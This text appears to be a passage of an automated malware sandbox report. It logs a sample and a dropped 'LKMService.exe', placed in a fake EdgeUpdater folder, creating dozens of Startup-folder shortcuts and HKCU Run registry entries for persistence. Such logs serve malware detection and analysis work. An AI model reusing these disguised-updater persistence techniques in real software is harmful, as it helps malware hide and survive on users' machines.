Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e28183393aa348268ac8c573d5502b1f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0afece5840df4176899b844c1d5c9e69.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_125c1fe126e14d0d9fac45186eb04ff2.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1e1d845915194135b12cc660ab6ebb4d.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5bac9b12a35b4a8abee5d849350d4cfe.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ece45098690b4892864172a47d52cf8f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ff0b2c7a1da5470f8bdba4c7d0d1baed.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_320177e11fbb4babb85356abf55e0b99.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c1e52c3798cb4024a6fd45d78ef65340.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_daef8724ed6347b895466620f5e665dc.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_640dcb995346434c96839d2d83742599.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bff12266345e44a9b496133053c7f263.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9b86ceab65de49c49beb8cb12c410381.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e0cda6700e20438397545917b25b60bc.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_167367bbfef04c4481dd697d094f8b63.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ae0f52f74f9348768b6eef36b80bbf5a.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c851befd38d2427d8d269a98d294e3a5.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f2bed5be759242edaf28dfd23e60fbb4.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dcfe5a74920d4318a87257b3fafacc01.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_34321b2281664b27a83ad01fa13bc0b3.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d7a9e1f71e674259bc6770546141070b.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bd6a94e54b01443cb6021458218b9ec9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_92941d340d434f5a9e68942462246f22.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_39159887f3204d8e8fefe4810af69af9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ae36cbf57bba423faea52eafbd67d52e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c282045190e841bc8018c75ed34f2677.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0760bad1395b4e6d9229cd7290d0bfd6.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dfb16a4487ec4beaa1b1d78b04a99008.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7dd43a72555644e192d6a68d17c5b960.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_10b941cabe434db3b065299af6c79bcc.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5e5ea231ea4e4ffca8c6bf1323ff31d9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_82d2f3a5637a4c2080f8baf85285f4da.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_13c709e1909a4ba0924f2c6a918a488b.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_190b0e7ea3364aab9ab02f751d3fa36e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3facc06f597b4bdd8a739c4670a80246.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_575324352462440e8b12a1e982435c9f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b3aacf1dbd5e4d3392e7bf3232dc57cf.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d931f0e9333144269687eae7d6b8ea59.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_03b6bab1fde244d28447e08c325e4a07.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3f0be1f466f84181ba333a6df3a516b0.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d65cc542a34b4da38cbe8960d3e8424b.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a36516a4c8cc471293cc601e09c286c1.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5176400ea1bc450d9688dfefc752db32.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ef824ea0ab1e402c87f6f1bf359c96ac.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_162795bda5fa46828118263a399b42b7.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1754dd6b32b448c08e8885636a675bf1.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_41af698d57e841f7a97a18d762254e95.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1e404b68114e438ea737eac2a2fab6e6.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8cc3aebaced943f9b806b6cb451bf3a1.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c1bdb7ca33394ca6a68f9cffd90716fd.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9435b417d7174818bc725d53c084ad74.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a146399d9db47d9bee8edf48f4efb76.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_14b6d09a20e948a5a8f9a9a0b7ab87d8.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4bd582915a8c4bfb97fa91bd4328b1e0.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5f8ba6889c254ba58b476a41f22439d0.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b26e46310f2a4f6d8edad21044105f29.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_34d44aca968f4415baf4a94db6ea8d00.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c74ff54973c3482b858e648393044bee.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d62bbecc00364362b14e059934ea6472.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7e2b335500384003acb1b579c9875623.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_90a28a31d7ae459b91fdf94045fbc96f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_97c93c184ade485a8a064ccc1c9187f0.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_acf87a42bf4b41579f8273f723e7d17d.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ffdc1a459af0433ab31a6499a0a0e333.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e4514974b9824faaadddc6ac58593bda.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_78f230ec7acf4b448fe76a84bdefb047.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9a583ee01cd34464bae9e4d0a80d99f0.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8e2bc38730ba4c8c9b07b18681955891.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_66e1e244985c436985d58ec91647105d.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0f1fa8cf3f2b4bf2a7574c0e4b2f376c.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9de743c8e437443b88530f3fe7688358.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0c043eea2c7a4b4182fb993ee1edaf06.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_43e7d75dce6f4a87860706dd852faaba.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f4d1bce3b46d49aab44bc8d0febe542e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_61650c5e6ecd479ea5598de8190804d8.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_98e24bddde1946faad7ab9a2f3a7aa3f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_17f7fee4e5104f968c19a4a9e6178d67.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3be1c6c02fcd4cbca121074b848dedc4.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e7e24d5a8d344423913a68fb440786f2.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_54d66de5935d4ecabaf6a00f0432d71e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6d091b3309424e76ae47b7d1edd0307f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3c9988356a104a099db4a06d01085945.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2bce08fd547d45aea7adcaabe45db843.lnkJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419eJump to behavior
Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_047c5762224547e8b0906f5148be419eJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_773ee3bb9e0f4071afc0e6a7986206d0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
